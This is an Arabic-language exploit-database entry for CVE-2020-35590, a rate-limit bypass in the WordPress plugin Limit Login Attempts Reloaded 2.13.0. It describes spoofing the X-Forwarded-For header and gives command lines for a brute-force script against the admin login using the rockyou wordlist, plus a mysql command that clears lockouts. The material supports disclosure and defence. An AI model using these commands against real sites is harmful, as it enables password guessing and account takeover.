
أداة هجوم القوة الغاشمة لإضافة ووردبريس Limit Login Attempts Reloaded >=2.13.0 - تجاوز حد تسجيل الدخول (CVE-2020-35590)
عنوان الاستغلال: WordPress Plugin Limit Login Attempts Reloaded 2.13.0 - تجاوز حد تسجيل الدخول
CVE: CVE-2020-35590
التاريخ: 2020-06-09
مؤلف الاستغلال: N4nj0
رابط البرنامج: https://wordpress.org/plugins/limit-login-attempts-reloaded/
الإصدار: 2.13.0
تم اختباره على: WordPress 5.4.1, 5.4.2
نشرة الثغرة: https://n4nj0.github.io/advisories/wordpress-plugin-limit-login-attempts-reloaded/
يهدف المكوّن الإضافي المتأثر في ووردبريس إلى أن يكون آلية حماية من هجمات القوة الغاشمة (Bruteforce)، وهو مثبّت حاليًا في أكثر من مليون تثبيت نشط.
لقد اكتشفت تجاوزًا لتحديد المعدل (Rate Limiting) عند استخدام إعدادات غير افتراضية، مما يُبطل الغرض من المكوّن الإضافي فعليًا.
./wp-brute.py -c -u http://wordpress -H X-Forwarded-For -l admin -P /usr/share/wordlists/rockyou.txt
./wp-brute.py --check --url http://wordpress --header X-Forwarded-For --login admin --passwordlist /usr/share/wordlists/rockyou.txt --quiet
./wp-brute.py -e -u http://wordpress -H X-Forwarded-For -l admin -P /usr/share/wordlists/rockyou.txt -q
./wp-brute.py --exploit --url http://wordpress --header X-Forwarded-For --login admin --passwordlist /usr/share/wordlists/rockyou.txt --quiet
mysql -uroot -ppassword wordpress -e "UPDATE wp_options SET option_value = '' WHERE option_name = 'limit_login_lockouts' LIMIT 1;"